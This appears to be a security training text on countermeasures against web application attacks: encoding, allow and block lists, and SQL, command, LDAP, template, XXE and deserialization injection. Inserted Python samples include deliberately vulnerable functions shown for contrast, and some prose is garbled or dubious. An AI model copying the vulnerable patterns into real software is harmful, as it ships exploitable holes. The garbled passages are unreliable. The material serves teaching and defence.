An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document. HTML encoding replaces unusual characters with strings that can be recognized, while the various characters define the structure of the document. If you want to use the same characters as those contained in the document, you might encounter problems. These problems can be overcome using HTML encoding. It defines several HTML entities to represent particularly unusual characters such as:

    &amp;  &
    &lt;   <
    &gt;   >

* Unicode Encoding

Unicode encoding is of two types: 16-bit Unicode encoding and UTF-8.

    16-bit Unicode Encoding: It replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in the hexadecimal format.

        %u2215  /

    UTF-8: It is a variable-length encoding standard that expresses each byte in the hexadecimal format and prefixes it with %.

        %c2%a9     ©
        %e2%89%a0  ≠

* Base64 Encoding

The Base64 encoding scheme represents any binary data using only printable ASCII characters. In general, it is used for encoding email attachments for safe transmission over SMTP and also for encoding user credentials. For example:

    cake  01100011 01100001 01101011 01100101

    Base64 Encoding: 011000 110110 000101 101011 011001 010000 000000 000000

* Hex Encoding

The hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data. For example:

    Hello  48656c6c6f
    Jason  4a61736f6e
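The encoding schemes above worked through in Python, including Base64 done by regrouping bits the way the "cake" example shows, plus the step a defender needs when these schemes meet input validation: decoding every layer before checking the value. This is an added example, not from the courseware; the function names are assumptions, and the sample strings are the page's own ("cake", "Hello", "Jason", "/", "©", "≠").

```python
"""Worked encoding schemes and a canonicalization check.

Added example, not from the CEH courseware. Function names are illustrative;
sample values come from the page. 'canonicalize' goes beyond the page by
undoing stacked URL and %u encodings before validation.
"""
import base64
import html
import re
from urllib.parse import quote, unquote


def url_encode(text: str) -> str:
    """Percent-encode: each unsafe byte becomes % plus two hex digits (UTF-8 first)."""
    return quote(text, safe="")


def utf8_percent(text: str) -> str:
    """The UTF-8 scheme above: every byte of the UTF-8 form as lower-case %xx."""
    return "".join("%%%02x" % b for b in text.encode("utf-8"))


def unicode_u_encode(text: str) -> str:
    """The legacy 16-bit %uXXXX form (non-standard, but still decoded by some apps)."""
    return "".join("%%u%04x" % ord(ch) for ch in text)


def html_encode(text: str) -> str:
    """Named entities for the characters that carry HTML structure: & < > \" '."""
    return html.escape(text, quote=True)


def base64_by_hand(data: bytes) -> str:
    """Base64 the way the page shows it: regroup 8-bit bytes into 6-bit chunks.

    'cake' -> 011000 110110 000101 101011 011001 010000 (zero-padded) -> Y2FrZQ==
    """
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    bits = "".join(format(b, "08b") for b in data)
    bits += "0" * ((-len(bits)) % 6)                      # pad to a 6-bit boundary
    out = "".join(alphabet[int(bits[i:i + 6], 2)] for i in range(0, len(bits), 6))
    return out + "=" * ((3 - len(data) % 3) % 3)          # '=' marks missing input bytes


def hex_encode(text: str) -> str:
    """Hex encoding: two hex digits per byte of the UTF-8 form."""
    return text.encode("utf-8").hex()


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Undo stacked URL and %u encodings until the value stops changing.

    Validating before this step is how a filter for '<' is bypassed with
    %253C (double URL encoding) or %u003C (16-bit Unicode encoding).
    """
    for _ in range(max_rounds):
        decoded = re.sub(r"%u([0-9a-fA-F]{4})",
                         lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded)
        if decoded == value:
            return value
        value = decoded
    return value
```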
Whitelisting vs. Blacklisting Applications
Web applications have played an important role in the adoption of digital transformation globally. Such rapid development has motivated attackers to compromise system security using different techniques and strategies that exploit the flaws and breaches present in the applications. To thwart these attacks, security professionals need to implement various security policies and testing strategies. Whitelisting and blacklisting is one such security strategy that can retain the applications, networks, and infrastructures securely. Using this strategy, one can create a list of entities that should be allowed and those that should be blocked. Thus, any malicious software can be effectively blocked before it enters the organizational network.

* Application Whitelisting

Application whitelisting specifies a list of application components such as software libraries, plugins, extensions, and configuration files, or legitimate software that can be permitted to execute in the system. It helps in preventing unauthorized execution and spreading of malicious programs. It can also prevent the installation of unapproved or vulnerable applications. Whitelisting provides greater flexibility by providing protection against ransomware and other types of malware attacks on web applications.

* Application Blacklisting

Application blacklisting specifies malicious applications or software that are not permitted to be executed in the system or the network. Blacklisting can be performed by blocking malicious applications that can cause potential damage or lead to attacks. Blacklisting is a threat-centric method; it cannot detect modern threats and results in attacks leading to data loss. Hence, it is important to update the blacklist regularly to defend against the latest malware attacks. Application blacklisting can be performed by adding the names of applications to be blocked at the firewall level or by installing specific software to block the applications.
Blacklisting and Whitelisting for Basic URL Management

URL blacklisting prevents the user from loading web pages from the blacklisted URLs. The user can access all URLs except those in the blacklist. URL whitelisting permits the users to access only specific URLs as exclusions to those that are added to the URL blacklist.

URL whitelisting is performed using the following methods:
- Allow access to all URLs except the blocked ones: Whitelisting can allow the users to access the rest of the network applications
- Block access to all URLs except permitted ones: Whitelisting can permit access to a limited list of URLs
- Define exceptions to very restrictive blacklists: Whitelisting lets users access specific schemes, subdomains of other domains, paths, or ports
- Allow the browser to open applications: Whitelisting is performed only for specific external protocol handlers so that the browser can automatically execute applications

URL blacklisting is performed using the following methods:
- Allow access to all URLs except the blocked ones: Blacklisting prevents users from accessing blocked websites
- Block access to all URLs except permitted ones: Blacklisting blocks access to all malicious URLs
- Define exceptions to very restrictive blacklists: Blacklisting restricts access to all URLs that are vulnerable to attacks
- Allow the browser to open apps: Blacklisting prevents the browser from automatically executing applications
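The four URL whitelisting and blacklisting methods above, as an added example that is not part of the courseware: a small policy evaluator in which a blocklist and an allowlist are matched against a URL and the most specific entry wins. The entry syntax ([scheme://]host[:port][/path], "*" for everything, a leading "." for exact host only) and the sample lists are constructed assumptions.

```python
"""Allow/block URL policy evaluator (added example, not EC-Council courseware).

Models the four URL whitelisting/blacklisting methods in the text:
  1. allow all URLs except the blocked ones   -> blocklist entries only
  2. block all URLs except the permitted ones -> blocklist ["*"] plus allowlist
  3. exceptions to a very restrictive list    -> allowlist entries naming a
     scheme, subdomain, path or port
  4. browser opening external applications   -> allowlist of protocol handlers
Entry syntax (constructed assumption): [scheme://]host[:port][/path] or "*".
A host entry also matches its subdomains unless it starts with ".".
The most specific matching entry decides; on a tie the allowlist wins.
"""
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Pattern:
    scheme: Optional[str]
    host: Optional[str]      # None = any host
    exact_host: bool         # True when the entry started with "."
    port: Optional[int]
    path: Optional[str]

    @classmethod
    def parse(cls, entry: str) -> "Pattern":
        if entry == "*":
            return cls(None, None, False, None, None)
        scheme = path = port = None
        if "://" in entry:
            scheme, entry = entry.split("://", 1)
            scheme = scheme.lower()
        if "/" in entry:                      # split the path off before the port
            entry, rest = entry.split("/", 1)
            path = "/" + rest
        if ":" in entry:
            entry, port_text = entry.rsplit(":", 1)
            port = int(port_text)
        exact = entry.startswith(".")
        host = entry.lstrip(".").lower() or None
        if host == "*":                       # e.g. "https://*" means any host
            host = None
        return cls(scheme, host, exact, port, path)

    def matches(self, url: str) -> bool:
        parts = urlsplit(url)
        if self.scheme is not None and parts.scheme.lower() != self.scheme:
            return False
        host = (parts.hostname or "").lower()
        if self.host is not None:
            if self.exact_host:
                if host != self.host:
                    return False
            elif host != self.host and not host.endswith("." + self.host):
                return False
        if self.port is not None and parts.port != self.port:
            return False                      # default ports are not inferred
        if self.path is not None and not parts.path.startswith(self.path):
            return False
        return True

    def specificity(self) -> int:
        """More host labels, then a port, then a path, then a scheme win."""
        score = 1 if self.scheme else 0
        if self.host:
            score += 100 * len(self.host.split("."))
        if self.port is not None:
            score += 10
        if self.path:
            score += len(self.path)
        return score


class UrlPolicy:
    def __init__(self, blocklist: List[str], allowlist: List[str]) -> None:
        self.block = [Pattern.parse(e) for e in blocklist]
        self.allow = [Pattern.parse(e) for e in allowlist]

    def is_allowed(self, url: str) -> bool:
        best_block = max((p.specificity() for p in self.block if p.matches(url)), default=None)
        best_allow = max((p.specificity() for p in self.allow if p.matches(url)), default=None)
        if best_block is None:                # nothing blocks it (method 1)
            return True
        if best_allow is None:                # blocked with no exception (method 2)
            return False
        return best_allow >= best_block       # most specific wins, tie -> allow


def example_policy() -> UrlPolicy:
    """Constructed policy: block everything, then carve out exceptions (methods 2-4)."""
    return UrlPolicy(
        blocklist=["*", "intranet.example.com/forbidden"],
        allowlist=["https://intranet.example.com",   # scheme-specific exception
                   "docs.example.com:8443",          # port-specific exception
                   ".api.example.com",               # this host only, no subdomains
                   "mailto://"],                     # external protocol handler
    )
```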
Application Whitelisting and Blacklisting Tools

Figure 16.102: Screenshot of Apility.io

Some additional application whitelisting and blacklisting tools are as follows:
- AutoShun (https://www.autoshun.org)
- Cisco Umbrella (https://umbrella.cisco.com)
- Alexa Top Sites (https://aws.amazon.com)
- APT Groups and Operations (https://docs.google.com)
- NordVPN (https://nordvpn.com)
How to Defend Against Injection Attacks

SQL Injection Attacks
- Disable commands such as xp_cmdshell
- Isolate the database server and web server
- Always use a method attribute set for POST and a low-privileged account for the DB connection
- Run a database service account with minimal rights
- Move extended stored procedures to an isolated server
- Use type-safe variables or functions such as isNumeric() to ensure type safety
- Validate and sanitize user inputs passed to the database
- Avoid using dynamic SQL and do not construct queries with the user input
- Use prepared statements, parameterized queries, or stored procedures to access the database
- Display less information and use the "RemoteOnly" customErrors mode to display verbose error messages only on the local machine
- Perform proper escaping and character filtering to avoid special characters, strings, and symbols such as single quotes (')
- Always set the whitelist logically instead of the blacklist to avoid bad code
- Use Object Relational Mapping (ORM) frameworks to make the conversion of SQL result sets into code objects more consistent
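The dynamic-SQL pitfall and the parameterized fix from the list above, as an added example that is not courseware code: a constructed in-memory sqlite3 table, a query built by string concatenation, the same query with placeholders, and the type-safe integer check the text describes with isNumeric(). The table, rows, and credentials are constructed (a real table stores password hashes, not plaintext).

```python
"""SQL injection: dynamic string query beside its parameterized fix.

Added example (not EC-Council courseware code). login_dynamic() builds the
SQL text from user input, the pattern the list says to avoid; login_parameterized()
uses a prepared, parameterized statement so the driver sends the values as data;
lookup_by_id() shows a type-safe check before the value reaches the database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table; plaintext pw column only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def login_dynamic(conn: sqlite3.Connection, name: str, pw: str) -> list:
    # VULNERABLE: user input becomes part of the SQL text, so a quote in the
    # input changes the query's structure instead of being compared as data.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn: sqlite3.Connection, name: str, pw: str) -> list:
    # HARDENED: placeholders; the values never become SQL, whatever they contain.
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return [row[0] for row in conn.execute(sql, (name, pw))]


def lookup_by_id(conn: sqlite3.Connection, user_id: str) -> list:
    # Type-safe variable: accept only a plain integer (the isNumeric() idea),
    # then bind it as a parameter as well.
    if not user_id.isdigit():
        raise ValueError("user id must be numeric")
    sql = "SELECT name FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(user_id),))]
```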
Command Injection Flaws

The simplest way to defend against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter and hence avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange the various requests in a pattern that ensures that all the given parameters are treated as data instead of potentially executable content.
be able to misuse administrative rights. The use of the Java sandbox in the J2EE environment stops the execution of system commands. External commands are used to check the user information when he/she provides it. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. Check all the output, return, and error codes from the call to ensure that it performs as expected. Doing so allows users to determine whether something has gone wrong. Otherwise, an attack might occur and never be detected.

Some countermeasures against command injection flaws are as follows:
- Perform input validation
- Escape dangerous characters
- Use language-specific libraries that avoid problems due to shell commands
- Perform input and output encoding
- Use a safe API that avoids use of the interpreter entirely
- Structure requests so that all supplied parameters are treated as data rather than potentially executable content
- Use parameterized SQL queries
- Use modular shell disassociation from the kernel
- Use built-in library functions and avoid calling OS commands directly
- Implement least privileges to restrict the permissions to execute the OS commands
- Avoid executing commands such as exec or system without proper validation and sanitization
- Prevent the shell interpreter using pcntl_fork and pcntl_exec within PHP
- Implement Python as a web framework instead of PHP for application development
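The "safe API that avoids the interpreter" and "input validation" countermeasures above, as an added example that is not courseware code: a shell-string call shown for contrast, an argv-list call in which the user value stays a single argument, and an allow-list hostname check run first. The child program is a Python one-liner standing in for a real tool such as ping (an assumption so the example runs offline).

```python
"""Command injection: shell string beside the argv-list fix (added example,
not EC-Council courseware code).

run_with_shell() is the pattern the text warns about: user input pasted into a
command line that /bin/sh interprets, so shell metacharacters become commands.
run_as_argv() uses an API without an interpreter, so every parameter reaches
the program as data; validate_hostname() is the positive input validation that
should run before any external call.
"""
import re
import subprocess
import sys

# DNS-style names only: labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$", re.I)
# Assumed stand-in for a real tool such as ping: prints its first argument.
ECHO_ARGV = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])"]


def validate_hostname(host: str) -> str:
    """Allow-list validation: only DNS-style names of sane length pass."""
    if len(host) > 253 or not HOSTNAME_RE.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return host


def run_with_shell(host: str) -> str:
    # VULNERABLE (shown for contrast, never called here): shell=True hands the
    # whole string to /bin/sh, so "host; other_command" also runs other_command.
    return subprocess.run("echo " + host, shell=True, capture_output=True, text=True).stdout


def run_as_argv(text: str) -> str:
    # No shell: `text` is exactly one argv element, however many ';' or '|' it
    # contains, so it can only ever be data to the child program.
    result = subprocess.run(ECHO_ARGV + [text], capture_output=True, text=True, check=True)
    return result.stdout


def safe_lookup(host: str) -> str:
    """Validate first, then call the external program without an interpreter."""
    return run_as_argv(validate_hostname(host))
```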
LDAP Injection Attacks

An LDAP injection attack is similar to an SQL injection attack: it exploits the user input to create LDAP queries. Execution of malicious LDAP queries in the web applications creates arbitrary queries that disclose information such as username and password, thus granting attackers unauthorized access and admin privileges.

Some countermeasures against LDAP injection attacks are as follows:
- Perform type, pattern, and domain value validation on all input data
- Make the LDAP filter as specific as possible
- Strongly validate the user input
- Consider implementing a chroot jail
- PHP: Disable allow_url_fopen and allow_url_include in php.ini
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables
- PHP: Ensure that all file and stream functions (stream_*) are carefully vetted
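The "validate the input" and "make the filter as specific as possible" countermeasures above in code, as an added example that is not courseware code: RFC 4515 escaping of every value placed in a search filter, a strict username pattern, and a filter that matches at most one person entry, next to the raw concatenation that LDAP injection exploits. The attribute names (uid, objectClass) and the username rule are assumptions.

```python
"""LDAP filter hardening (added example, not EC-Council courseware code).

escape_filter_value() applies the RFC 4515 escapes so a value cannot change the
filter's structure; user_filter() validates the input pattern first and keeps
the filter specific (exact uid AND objectClass=person). unsafe_filter() shows
the concatenation that lets "*" or ")(" rewrite the query.
"""
import re

_RFC4515_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
USERNAME_RE = re.compile(r"^[a-z0-9._-]{1,64}$")      # constructed username rule


def escape_filter_value(value: str) -> str:
    """Escape an assertion value for use inside an LDAP search filter."""
    return "".join(_RFC4515_ESCAPES.get(ch, ch) for ch in value)


def unsafe_filter(username: str) -> str:
    # VULNERABLE: raw concatenation; a username of "*" matches every entry.
    return f"(uid={username})"


def user_filter(username: str) -> str:
    """Specific, escaped filter that can match at most one person entry."""
    if not USERNAME_RE.match(username):             # type/pattern validation
        raise ValueError(f"username has an unexpected format: {username!r}")
    return f"(&(uid={escape_filter_value(username)})(objectClass=person))"
```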
Server-Side JS Injection
- Ensure that user inputs are strictly validated on the server side before processing
- Avoid using the eval() function to parse the user input
- Never use commands having identical effects, such as setTimeout(), setInterval(), and Function()
- Use JSON.parse() instead of eval() to parse the JSON input
- Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks
Server-Side Template Injection
- Do not create templates from user inputs or pass user inputs as parameters into the templates
- Use a simple template engine such as Mustache or Python's template if the business requirements support user-submitted templates
- Review the template engine's documentation for hardening tips
- Execute the template inside a sandboxed environment
- Consider loading static template files wherever possible
- Always make sure to pass dynamic data to a template using the template engine's built-in functionality
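The difference between building a template out of user text and passing user text into a static template, as an added example that is not courseware code, using Python's string.Template (the simple engine the list names). CONFIG is a constructed stand-in for server-side values a template can reach.

```python
"""Server-side template injection: template built from user input beside the
static-template fix (added example, not EC-Council courseware code).

render_vulnerable() concatenates user text into the template source, so any
placeholder the user types is expanded with server-side data. render_hardened()
keeps the template static and hands user text in through the engine's own
substitution, where it stays literal.
"""
from string import Template

CONFIG = {"app_name": "Demo", "db_password": "constructed-secret"}   # constructed


def render_vulnerable(user_text: str) -> str:
    # VULNERABLE: user text becomes part of the template itself.
    tpl = Template("Hello, " + user_text + "! Welcome to $app_name.")
    return tpl.safe_substitute(CONFIG)


GREETING = Template("Hello, $name! Welcome to $app_name.")   # static template


def render_hardened(user_text: str) -> str:
    # HARDENED: the template is fixed; user text is a parameter, so "$db_password"
    # typed by the user is output verbatim instead of being expanded.
    return GREETING.substitute(CONFIG, name=user_text)
```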
Log Injection
- Pass log codes instead of messages through parameters
- Use correct error codes and easily recognizable error messages
- Avoid using API calls to log actions due to their visibility in browser network calls
- Make sure to pass user IDs or publicly non-identifiable inputs as the parameters at logging endpoints
- Validate inputs at both the server side and the client side and sanitize and replace the malicious characters
- Examine the application carefully for any vulnerabilities that are used to render logs

HTML Injection
- Validate all the user inputs to remove the HTML-syntax substrings from user-supplied text
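The "sanitize and replace the malicious characters" and "remove the HTML-syntax substrings" items above, as an added example that is not courseware code: a log-line builder that keeps one event on one line by neutralizing CR/LF and other control characters, and a stripper for HTML tags in user-supplied text. The log format and sample inputs are constructed.

```python
"""Log-injection and HTML-injection input sanitization (added example, not
EC-Council courseware code).

sanitize_for_log() replaces control characters (including CR/LF) with visible
escapes so a user cannot forge a second log line; log_line() logs a code and a
user ID, as the text suggests, with the free text sanitized. strip_html()
removes HTML tags from user-supplied text and encodes what remains.
"""
import html
import re

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")          # CR, LF, TAB, NUL, ...
_TAG = re.compile(r"</?[a-zA-Z][^>]*>")             # <b>, </b>, <script ...>


def sanitize_for_log(value: str, max_len: int = 200) -> str:
    """Neutralise control characters and cap the length of a logged field."""
    cleaned = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)
    return cleaned[:max_len]


def log_line(code: str, user_id: str, detail: str) -> str:
    """One event per line: a log code, the user ID, and sanitized free text."""
    return f"code={code} user={sanitize_for_log(user_id)} detail={sanitize_for_log(detail)}"


def strip_html(text: str) -> str:
    """Remove HTML-syntax substrings, then entity-encode the remaining text."""
    return html.escape(_TAG.sub("", text), quote=True)
```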
Web Application Attack Countermeasures (slide series)

The slides in this series cover: Broken Authentication and Sensitive Data Exposure; XML External Entity; Security Misconfiguration; XSS Attacks; Insecure Deserialization; Using Components with Known Vulnerabilities; Directory Traversal; Watering Hole Attack; Cross-Site Request Forgery; Cookie/Session Poisoning; Clickjacking Attack; JavaScript Hijacking; Username Enumeration; Attack on Password Reset Mechanism.
Web Application Attack Countermeasures

Broken Authentication and Session Management

Flaws in authentication and session management functions allow attackers to gain passwords, keys, and session tokens or exploit other implementation vulnerabilities to gain other users' credentials.
- Use SSL for all authenticated parts of the application
- Verify whether all the users' identities and credentials are stored in a hashed form
- Never submit session data as part of a GET or POST
- Apply passphrasing with at least five random words
- Limit the login attempts and lock the account for a specific period after a certain number of failed attempts
- Use a secure platform session manager to generate long random session identifiers for secure session development
- Implement multi-factor authentication mechanisms to prevent credential guessing, stuffing, and brute-forcing
- Make sure to secure passwords with a cryptographic password hash algorithm or tools such as bcrypt, scrypt, or Argon2
- Make sure to check passwords against a list of the top probable weak or bad passwords
- Log authentication failures and send alerts whenever attacks are detected
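Several of the items above in one place, as an added example that is not courseware code: scrypt password hashing (one of the algorithms the list names) with constant-time verification, a weak-password list check, a failed-attempt lockout that logs failures and raises alerts, and long random session identifiers. The lockout thresholds and the weak-password list are constructed assumptions.

```python
"""Password storage, login lockout and session IDs (added example, not
EC-Council courseware code).

hash_password()/verify_password() use hashlib.scrypt with a random salt and a
constant-time comparison; LoginGuard locks an account after MAX_FAILURES bad
attempts and records failure/alert events; new_session_id() draws a long
random identifier. Policy numbers and the weak-password list are assumptions.
"""
import hashlib
import hmac
import secrets
import time

SCRYPT = dict(n=2**14, r=8, p=1)
WEAK_PASSWORDS = {"123456", "password", "qwerty", "letmein"}   # constructed list
MAX_FAILURES, LOCKOUT_SECONDS = 5, 900


def hash_password(password: str) -> str:
    """Reject known-weak passwords, then store salt and scrypt digest."""
    if password.lower() in WEAK_PASSWORDS:
        raise ValueError("password is on the weak-password list")
    salt = secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    _, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT)
    return hmac.compare_digest(digest.hex(), digest_hex)


class LoginGuard:
    """Locks an account for LOCKOUT_SECONDS after MAX_FAILURES bad attempts."""

    def __init__(self, now=time.time):
        self.now = now                     # injectable clock for testing
        self.failures = {}                 # user -> consecutive failures
        self.locked_until = {}             # user -> unlock timestamp
        self.events = []                   # what would go to the security log

    def attempt(self, user: str, stored: str, password: str) -> bool:
        if self.locked_until.get(user, 0) > self.now():
            self.events.append(f"ALERT locked account {user} tried again")
            return False
        if verify_password(stored, password):
            self.failures.pop(user, None)
            return True
        self.failures[user] = self.failures.get(user, 0) + 1
        self.events.append(f"AUTH_FAIL user={user} count={self.failures[user]}")
        if self.failures[user] >= MAX_FAILURES:
            self.locked_until[user] = self.now() + LOCKOUT_SECONDS
            self.events.append(f"ALERT lockout user={user}")
        return False


def new_session_id() -> str:
    """Long random session identifier (256 bits, URL-safe)."""
    return secrets.token_urlsafe(32)
```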
Sensitive Data Exposure

Many web applications do not properly protect sensitive data such as credit card numbers, SSNs, and authentication credentials with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

Some countermeasures against sensitive data exposure attacks are as follows:
- Do not create or use weak cryptographic algorithms
- Generate encryption keys offline and store them securely
- Ensure that encrypted data stored on the disk is not easy to decrypt
- Use AES encryption for stored data and use TLS with HSTS (HTTP Strict Transport Security) for incoming traffic
- Classify the data processed, stored, or transmitted by an application and apply controls accordingly
- Use PCI DSS compliant tokenization or truncation to remove the data soon after its requirement
- Use proper key management and ensure that all the keys are in place
- Encrypt all the data in transit using TLS with Perfect Forward Secrecy (PFS) ciphers
- Disable caching techniques for requests that contain sensitive information
XML External Entity
- Avoid processing XML input containing references to external entities by a weakly configured XML parser
- The XML unmarshaller should be configured securely
- Parse the document with a securely configured parser
- Configure the XML processor to use a local static DTD and disable any declared DTD included in an XML document
- Implement whitelisting, input validation, sanitation, and filtering techniques to prevent hostile data within the XML documents
- Avoid client-side caching mechanisms
- Remove session tokens on the server side on user logout
- Ensure that minimum privileges are assigned to users to perform only essential actions
- Enforce access control mechanisms once and re-use them throughout the application
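The "disable any declared DTD included in an XML document" countermeasure above, as an added example that is not courseware code: an expat pre-scan that rejects a DOCTYPE, any entity declaration, and any external entity reference before ElementTree parses the document. The sample documents are constructed and the file path in the hostile one is a placeholder.

```python
"""XXE-resistant XML parsing (added example, not EC-Council courseware code).

parse_untrusted_xml() first runs the document through a bare expat parser
whose handlers raise on DOCTYPE, entity declarations and external entity
references, then parses it with ElementTree. A document that declares a DTD
never reaches the second step, so neither external entities nor internal
entity expansion (billion-laughs style) can be triggered.
"""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class XXEBlocked(ValueError):
    """Raised when the input declares a DTD or references an entity."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise XXEBlocked(f"DOCTYPE not allowed (root element {name!r})")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise XXEBlocked(f"entity declaration not allowed: {name!r}")


def _reject_external(context, base, sysid, pubid):
    raise XXEBlocked(f"external entity reference not allowed: {sysid!r}")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.EntityDeclHandler = _reject_entity
    scanner.ExternalEntityRefHandler = _reject_external
    scanner.Parse(data, True)            # raises XXEBlocked or expat.ExpatError
    return ET.fromstring(data)           # only DTD-free, well-formed XML gets here


# Constructed samples; the SYSTEM path is a placeholder, not a real target.
SAFE_DOC = b"<order><item sku='A1' qty='2'/></order>"
HOSTILE_DOC = (b"<?xml version='1.0'?>"
               b"<!DOCTYPE order [<!ENTITY ext SYSTEM 'file:///path/to/secret'>]>"
               b"<order>&ext;</order>")
```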
Security Misconfiguration

Security misconfiguration potentially makes web applications vulnerable and may provide attackers with access to them as well as to files and other application-controlling functions. Insufficient transport layer protection allows attackers to obtain unauthorized access to sensitive information as well as to perform attacks such as account theft, phishing, and compromising admin accounts. Encrypt all communications between the website and client to prevent attacks due to insufficient transport layer protection.

Some countermeasures against security misconfiguration attacks are as follows:
- Configure all security mechanisms and disable all unused services
- Set up roles, permissions, and accounts and disable all default accounts or change their default passwords
- Scan for the latest security vulnerabilities and apply the latest security patches
- Non-SSL requests to web pages should be redirected to the SSL page
- Set the 'secure' flag on all sensitive cookies
- Configure the SSL provider to support only strong algorithms
- Ensure that the certificate is valid and not expired, and that it matches all domains used by the site
- Backend and other connections should also use SSL or other encryption technologies
XSS Attacks

XSS is another type of input validation attack that targets the flawed input validation mechanism of web applications for the purpose of malicious activities. Attackers embed a malicious script into web application input gates, which allows them to bypass the security measures imposed by the applications.

Some countermeasures against XSS attacks are as follows:
- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
- Use the testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
- Use a web application firewall to block the execution of a malicious script
- Convert all non-alphanumeric characters into HTML character entities before displaying the user input in search engines and forums
- Encode the input and output and filter metacharacters in the input
- Never trust websites that use HTTPS when it comes to XSS
- Filtering the script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
- Deploy public key infrastructure (PKI) for authentication, which checks to ascertain that the script introduced is actually authenticated
- Implement a stringent security policy

Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is difficult to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code and search in all the places where the input from an HTTP request comes as an output through HTML.

Attackers use a variety of HTML tags to transmit a malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If the scanning discovers a vulnerability in a website, it is highly likely to be vulnerable to other attacks.

Review the website code to defend against XSS attacks. Check the robustness of the code by reviewing it and comparing it against exact specifications. Check the following areas: headers, cookies, query strings, form fields, and hidden fields. During the validation process, there must be no attempt to recognize the active content, either by removing the filter or by sanitizing it.

There are many ways to encode known filters for active content. A "positive security policy" is highly recommended, which specifies what is allowed and what must be removed. Negative or attack signature-based policies are difficult to maintain, as they are incomplete.

Input fields should be limited to a maximum size since most script attacks need several characters to initiate.
- Implement Content Security Policy (CSP) to prevent the browser from executing XSS attacks
- Escape untrusted HTTP request data based on the context in the HTML output to resolve Reflected and Stored XSS vulnerabilities
- Employ context-sensitive encoding when altering the browser document on the client side, which acts against DOM-XSS
Insecure Deserialization
- Validate untrusted input that is to be serialized to ensure that the serialized data contains only trusted classes
- If deserialization of trusted data must cross a trust boundary, developers must re-architect their applications
- Avoid serialization for security-sensitive classes
- Guard sensitive data during deserialization
- Filter untrusted serial data
- Enforce duplicate security manager checks in a class during serialization and deserialization
- Understand the security permissions given to serialization and deserialization
- Implement integrity checks or encryption of the serialized objects to prevent modification of the serialized data or hostile object creation
- Isolate code that deserializes so that it runs in very-low-privileged environments
- Log the deserialization exceptions and failures, such as when the incoming type is not the same as the expected type; otherwise, it throws an exception
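The "serialized data contains only trusted classes" and "integrity checks of the serialized objects" items above, as an added example that is not courseware code: an HMAC tag over the serialized bytes, checked before anything is deserialized, and a pickle Unpickler restricted to an allow-list of classes. The key, the trusted-class set, and the sample record are constructed.

```python
"""Insecure deserialization countermeasures (added example, not EC-Council
courseware code): an HMAC integrity check on the serialized bytes and a
pickle loader restricted to an allow-list of trusted classes.

Primitive containers (dict, list, str, int) need no allow-list entry because
pickle rebuilds them without a class lookup; any other class goes through
find_class(), where RestrictedUnpickler decides.
"""
import datetime
import hashlib
import hmac
import io
import pickle

SECRET_KEY = b"constructed-server-side-key"            # assumption: held server-side
TRUSTED_CLASSES = {("datetime", "date")}               # constructed allow-list


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to instantiate anything outside the trusted-class allow-list."""

    def find_class(self, module, name):
        if (module, name) in TRUSTED_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"untrusted class {module}.{name}")


def serialize(obj) -> bytes:
    """Pickle, then prefix a 32-byte HMAC-SHA256 tag over the pickle bytes."""
    body = pickle.dumps(obj, protocol=4)
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return tag + body


def deserialize(blob: bytes):
    """Verify the tag first; only then hand the bytes to the restricted loader."""
    tag, body = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
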